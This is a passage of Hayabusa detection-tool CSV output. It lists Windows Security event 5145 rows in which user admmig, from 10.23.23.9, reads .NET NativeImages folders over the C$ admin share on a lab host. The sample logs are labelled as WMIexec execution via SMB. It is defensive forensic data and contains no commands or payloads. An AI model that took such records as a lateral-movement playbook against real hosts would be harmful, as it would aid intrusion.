Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\93aa8a60d293a05752aca14646afe6d2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\65b4d38e24dfdd935b19ba1de243c244 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.600 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.616 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Iden1fe87377#\20e180f5a613fa6fc6d2734676e45df9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Idena7b556ff#\c44a74a8e4b895c50ca0a52e97d6428a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IdentityModel\15e0783372e02bd437cab8ac76420124 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.631 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cb3b124c8#\f7a43000e540605d6e0e171da4c2f1d4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Cf61e09c5#\d72f9f8f53d2cae7691f333739a06f37 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.IO.Log\dbe5b3f92de7a1dc3900640c1907d600 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\4c22f9b9fda7e935d191dafdc77d9b1f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Manaf08ebffb#\f16e228634f247a35562db6ee33649f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.647 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Management\d1e6b39e15536aaa5fb9b1cacf8b18aa | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Messaging\0a331cd9fc9df7d44e898baf51e9e09e | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net\61ed18221f09c6ff1b6071ff5a269d08 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.22cc68a8#\4a545096f3372d1b7307ee8849058910 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5ba9e9e2d2253e30f3f28e12016e441d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics\8e945b32dd6b4b00c900f6c01c0f3c62 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.662 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Printing\0f95ad97e3260801c998976fb3a0e0e1 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Reflc3377498#\4febdd9160ebfd86d00365dbdaca9054 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.678 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt0d283adf#\32aee6654d81a07e698f9ee18c886a2a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | 
Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.694 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt19c51595#\65e679add728957b62f4bbba59d88386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.725 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt73a1fc9d#\3e17b0be5e7a03853d44d996d366e88b | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ 
| Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.741 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt93d54979#\2abf386e286ec43711933fbe3e652014 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runt9064068c#\6ef9bbadb5c7087da45798a762683eeb | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.756 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runtc259d85b#\ed68489987b413410ccb94c6e704f6b4 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.772 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\183eaaded316165bfbd32a991e4e8c8a | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 
Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Security\ba6ea4732f569e0674d6a43a82de5cc2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\System.Serv14b62006#\09e0258d6e4a9d467c32dc8ac58766f2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.787 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
